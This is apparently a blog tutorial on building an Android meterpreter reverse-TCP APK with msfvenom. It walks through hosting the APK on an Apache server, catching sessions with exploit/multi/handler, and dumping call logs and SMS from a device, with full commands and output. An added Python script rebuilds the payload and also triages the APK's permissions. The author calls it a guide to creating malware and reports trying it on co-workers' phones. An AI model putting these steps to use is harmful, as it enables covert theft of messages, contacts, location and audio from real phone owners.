This was an interesting topic that I ran across not too long ago... and it seems that the process for generating a meterpreter payload for an Android device is very simple. However, actually deploying this 'malware' payload to Android devices in the wild may be a bit of a different story. It would likely take plenty of development on the actual meterpreter source code (which is open source), getting registered on the Google Play Store, and then getting past the application vetting Google does when you publish something there... but that is a topic for another day, so let's get started!
First off we get our Metasploit Framework console (msfconsole) up and running.
Secondly we set up a multi-purpose exploit handler (exploit/multi/handler) to catch our Android-based reverse TCP meterpreter. ExitOnSession false keeps the handler listening after the first session connects, and exploit -j runs it as a background job so the console stays usable.
    msf > use exploit/multi/handler
    msf exploit(handler) > set payload android/meterpreter/reverse_tcp
    payload => android/meterpreter/reverse_tcp
    msf exploit(handler) > set lhost 172.16.2.253
    lhost => 172.16.2.253
    msf exploit(handler) > set lport 4444
    lport => 4444
    msf exploit(handler) > set exitonsession false
    exitonsession => false
    msf exploit(handler) > exploit -j
    [*] Exploit running as background job.
    [*] Started reverse TCP handler on 172.16.2.253:4444
    msf exploit(handler) > [*] Starting the payload handler...
Now we will set up a quick and dirty delivery mechanism to get the Android .apk from our attacking machine to the Android device. We will do this by simply using the Apache server that ships with Kali Linux and dropping the file in its web root, /var/www/html, so the device can fetch it from http://172.16.2.253/myapp.apk. (The netstat grep below matches any port whose number contains '80'; grep for ':80 ' instead if the box also has something listening on 8080.)
    root@nethunterarch:/var/www/html# service apache2 start
    root@nethunterarch:/var/www/html# netstat -ant | grep LISTEN | grep 80
    tcp6       0      0 :::80                   :::*                    LISTEN
Now for our payload... Using the canned / built-in payloads from Metasploit we can use 'msfvenom' to generate the app. The raw output for this payload is already a complete APK archive, so redirecting stdout into a file with a '.apk' extension is all it takes (msfvenom's -o myapp.apk does the same thing without the shell redirect).
    root@nethunterarch:/var/www/html# msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.2.253 LPORT=4444 > myapp.apk
    No platform was selected, choosing Msf::Module::Platform::Android from the payload
    No Arch selected, selecting Arch: dalvik from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 8839 bytes
    root@nethunterarch:/var/www/html# ls
    myapp.apk
And that's it! You now have an Android application that will execute an Android-based meterpreter. Pretty simple, right? To play around with it you will need a machine with Android Studio installed (available here: https://developer.android.com/studio/index.html; it runs on Windows, macOS and Linux). The install will take a bit if you don't already have it; I just did the default install and grabbed some coffee.
After the install is done we have to get to the 'AVD Manager', the part of Android Studio that manages virtual Android devices. From the AVD Manager we can launch a wizard to create our first virtual Android device; this process is not complicated and really not in scope for this post, so that part is up to you =)
After our virtual Android device is built, we simply hit the little play button and it opens the emulator with the device. Once it has started we just have to get our evil app onto the phone: browse to http://172.16.2.253/myapp.apk from the emulator, or push it straight in with adb install myapp.apk, which skips the browser download entirely. (The emulator reaches the host's network through NAT; if the handler is running on the same machine as the emulator, 10.0.2.2 is the emulator's alias for the host's loopback.) It is important to note the difference between the emulator and a real device here: the emulator image does not get in the way of sideloading, whereas a stock Android device blocks installation from anywhere but the Play Store by default ('Unknown sources' under Settings > Security, or a per-app 'Install unknown apps' toggle on Android 8 and later), so a user in the wild would be prompted to enable that setting before the app could be installed.
After the app has been installed on the virtual Android device and started, we catch our meterpreter session on the attacking machine.
The meterpreter build for Android is pretty full featured, with lots of tools:
    meterpreter > help

    Core Commands
    =============

        Command                   Description
        -------                   -----------
        ?                         Help menu
        background                Backgrounds the current session
        bgkill                    Kills a background meterpreter script
        bglist                    Lists running background scripts
        bgrun                     Executes a meterpreter script as a background thread
        channel                   Displays information or control active channels
        close                     Closes a channel
        disable_unicode_encoding  Disables encoding of unicode strings
        enable_unicode_encoding   Enables encoding of unicode strings
        exit                      Terminate the meterpreter session
        get_timeouts              Get the current session timeout values
        help                      Help menu
        info                      Displays information about a Post module
        irb                       Drop into irb scripting mode
        load                      Load one or more meterpreter extensions
        machine_id                Get the MSF ID of the machine attached to the session
        quit                      Terminate the meterpreter session
        read                      Reads data from a channel
        resource                  Run the commands stored in a file
        run                       Executes a meterpreter script or Post module
        sessions                  Quickly switch to another session
        set_timeouts              Set the current session timeout values
        sleep                     Force Meterpreter to go quiet, then re-establish session.
        transport                 Change the current transport mechanism
        use                       Deprecated alias for 'load'
        uuid                      Get the UUID for the current session
        write                     Writes data to a channel

    Stdapi: File system Commands
    ============================

        Command       Description
        -------       -----------
        cat           Read the contents of a file to the screen
        cd            Change directory
        checksum      Retrieve the checksum of a file
        cp            Copy source to destination
        dir           List files (alias for ls)
        download      Download a file or directory
        edit          Edit a file
        getlwd        Print local working directory
        getwd         Print working directory
        lcd           Change local working directory
        lpwd          Print local working directory
        ls            List files
        mkdir         Make directory
        mv            Move source to destination
        pwd           Print working directory
        rm            Delete the specified file
        rmdir         Remove directory
        search        Search for files
        upload        Upload a file or directory

    Stdapi: Networking Commands
    ===========================

        Command       Description
        -------       -----------
        ifconfig      Display interfaces
        ipconfig      Display interfaces
        portfwd       Forward a local port to a remote service
        route         View and modify the routing table

    Stdapi: System Commands
    =======================

        Command       Description
        -------       -----------
        execute       Execute a command
        getuid        Get the user that the server is running as
        localtime     Displays the target system's local date and time
        ps            List running processes
        shell         Drop into a system command shell
        sysinfo       Gets information about the remote system, such as OS

    Stdapi: Webcam Commands
    =======================

        Command        Description
        -------        -----------
        record_mic     Record audio from the default microphone for X seconds
        webcam_chat    Start a video chat
        webcam_list    List webcams
        webcam_snap    Take a snapshot from the specified webcam
        webcam_stream  Play a video stream from the specified webcam

    Android Commands
    ================

        Command           Description
        -------           -----------
        activity_start    Start an Android activity from a Uri string
        check_root        Check if device is rooted
        dump_calllog      Get call log
        dump_contacts     Get contacts list
        dump_sms          Get sms messages
        geolocate         Get current lat-long using geolocation
        hide_app_icon     Hide the app icon from the launcher
        interval_collect  Manage interval collection capabilities
        send_sms          Sends SMS from target session
        set_audio_mode    Set Ringer Mode
        sqlite_query      Query a SQLite database from storage
        wakelock          Enable/Disable Wakelock
        wlan_geolocate    Get current lat-long using WLAN information
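The Android commands in that listing only work because the generated app declares the matching permissions: dump_sms needs READ_SMS, dump_calllog needs READ_CALL_LOG, geolocate needs a location permission, and so on. On the Android 5.1.1 image used later in this post those are all granted at install time (Android 6.0 and later prompt at runtime for the dangerous ones), so the manifest of myapp.apk is the first thing a defender or a tester should look at. The script below is an added example, not code from the original post or from Metasploit: it recreates the handler setup and msfvenom build from the earlier steps as a resource script plus a subprocess call (build_apk only runs when msfvenom is on PATH), and then does a static triage of the APK with nothing but the standard library: zip entries, whether a JAR signature block is present, and every android.permission.* name found in the binary manifest's string pool (AXML stores strings as UTF-16LE unless its UTF-8 flag is set, so both encodings are scanned). The APK it inspects by default is a constructed stand-in built in-memory so the example runs offline; it is not a valid AXML file or installable app. File names, the hypothetical apk_triage.py name and the permission set in the sample are my assumptions.

```python
"""Build, stage and triage the Android meterpreter APK from the post.

Added example, not code from the original post or from Metasploit.
Assumes msfvenom is on PATH only for build_apk(); everything else runs offline.
"""
import hashlib
import io
import re
import shutil
import subprocess
import sys
import zipfile

PAYLOAD = "android/meterpreter/reverse_tcp"

# android.permission.* as it appears in the AndroidManifest.xml string pool.
# AXML stores strings as UTF-16LE unless the UTF-8 flag is set, so scan both.
_PERM_UTF8 = re.compile(rb"android\.permission\.[A-Z_]+")
_PERM_UTF16 = re.compile(
    re.escape("android.permission.".encode("utf-16-le")) + rb"(?:[A-Z_]\x00)+"
)


def handler_rc(lhost: str, lport: int) -> str:
    """msfconsole resource script equivalent to the handler setup in the post
    (run it with: msfconsole -q -r handler.rc)."""
    return "\n".join([
        "use exploit/multi/handler",
        f"set payload {PAYLOAD}",
        f"set lhost {lhost}",
        f"set lport {lport}",
        "set exitonsession false",
        "exploit -j",
        "",
    ])


def build_apk(lhost: str, lport: int, out_path: str):
    """Generate the APK with msfvenom -o (same result as the shell redirect).
    Returns the file's SHA-256, or None when msfvenom is not installed."""
    if shutil.which("msfvenom") is None:
        return None
    subprocess.run(
        ["msfvenom", "-p", PAYLOAD, f"LHOST={lhost}", f"LPORT={lport}", "-o", out_path],
        check=True,
    )
    with open(out_path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def inspect_apk(data: bytes) -> dict:
    """Static triage of an APK image: entry names, whether a JAR signature
    block is present, and the android.permission.* names in the manifest
    string pool. Returns plain data so it can be logged or diffed."""
    zf = zipfile.ZipFile(io.BytesIO(data))
    names = zf.namelist()
    manifest = zf.read("AndroidManifest.xml")
    perms = {m.group().decode() for m in _PERM_UTF8.finditer(manifest)}
    perms |= {m.group().decode("utf-16-le") for m in _PERM_UTF16.finditer(manifest)}
    signed = any(
        n.startswith("META-INF/") and n.upper().endswith((".RSA", ".DSA", ".EC"))
        for n in names
    )
    return {
        "sha256": hashlib.sha256(data).hexdigest(),
        "entries": names,
        "has_dex": "classes.dex" in names,
        "signed": signed,
        "permissions": sorted(perms),
    }


def constructed_sample_apk() -> bytes:
    """Constructed stand-in for myapp.apk (assumption, not msfvenom output):
    a zip with the usual entry names and a fake manifest whose string pool
    holds UTF-16LE permission names. Not valid AXML and not installable."""
    strings = [
        "manifest", "android.permission.INTERNET", "android.permission.READ_SMS",
        "android.permission.READ_CALL_LOG", "android.permission.ACCESS_FINE_LOCATION",
    ]
    # 03 00 08 00 is the AXML chunk header (RES_XML_TYPE, header size 8).
    manifest = b"\x03\x00\x08\x00" + b"".join(
        s.encode("utf-16-le") + b"\x00\x00" for s in strings
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", manifest)
        zf.writestr("classes.dex", b"dex\n035\x00" + b"\x00" * 32)
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")  # no .RSA: unsigned
    return buf.getvalue()


if __name__ == "__main__":
    # Usage: python3 apk_triage.py [myapp.apk]; without a path the constructed
    # sample is inspected. The resource script is printed for redirection.
    print(handler_rc("172.16.2.253", 4444))
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else constructed_sample_apk()
    for key, value in inspect_apk(data).items():
        print(f"{key}: {value}")
```

Run it as python3 apk_triage.py myapp.apk against the real msfvenom output to see what the app actually requests before it ever reaches a device. The permission scan is a string-pool grep, not a full AXML parse, so treat it as a quick triage and use aapt dump permissions or apktool for the authoritative manifest; the sha256 is there so the file staged in /var/www/html can be matched against whatever lands on the handset.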
I like the 'check_root' command, as I could imagine in a real-world scenario that if someone has a rooted phone they are likely to have many security controls misconfigured, both on the Android device and on any other system it comes into contact with, which could be a good pivot into a corporate or home network.
As you can see in the shot below, our virtual Android device is indeed rooted! I honestly didn't expect this, but it is an interesting bit of information to know. I have also run two other commands, 'dump_calllog' and 'dump_sms'.
These two commands were pretty interesting to me, as you essentially end up with a massive amount of data from the device (I performed all this on my actual Android phone and was surprised how quickly information can be exfiltrated from your device).
    root@nethunterarch:~# cat calllog_dump_20170214111302.txt
    =================
    [+] Call log dump
    =================

    Date: 2017-02-14 11:13:02 -0700
    OS: Android 5.1.1 - Linux 3.10.0+ (x86_64)
    Remote IP: 172.16.2.252
    Remote Port: 7751

    #1
    Number  : 6505551212
    Name    : null
    Date    : Tue Feb 14 10:15:28 MST 2017
    Type    : INCOMING
    Duration: 3

    root@nethunterarch:~# cat sms_dump_20170214111310.txt
    =====================
    [+] SMS messages dump
    =====================

    Date: 2017-02-14 11:13:10 -0700
    OS: Android 5.1.1 - Linux 3.10.0+ (x86_64)
    Remote IP: 172.16.2.252
    Remote Port: 7751

    #1
    Type    : Incoming
    Date    : 2017-02-14 10:15:36
    Address : 6505551212
    Status  : NOT_RECEIVED
    Message : Don't forget the marshmallows!

    #2
    Type    : Outgoing
    Date    : 2017-02-14 10:14:26
    Address : (575) 519-9637
    Status  : NOT_RECEIVED
    Message : Testing txt
My next exploration was to see what our canned payload looked like in memory, and it turns out that it looks just like any other app on the phone...
Somewhat to my disappointment, I was unable to get meterpreter to migrate to other PIDs or otherwise get out of this standard application context. That being said, I am sure this can be done, and the hour or so I spent playing around with it is likely not enough time to deduce such a method. The other interesting note is that if the user does a 'Force Stop', the meterpreter session dies. I fully expected this behavior, but it is interesting nonetheless: the payload lives inside the app's own process (the help listing above has no migrate command), so stopping the app stops the session.
And there you have it: a quick spitball guide to creating malware for Android devices. I have tested this on my own devices as well as some buddies' and co-workers', and it seems to work on all versions of Android up to this point anyhow.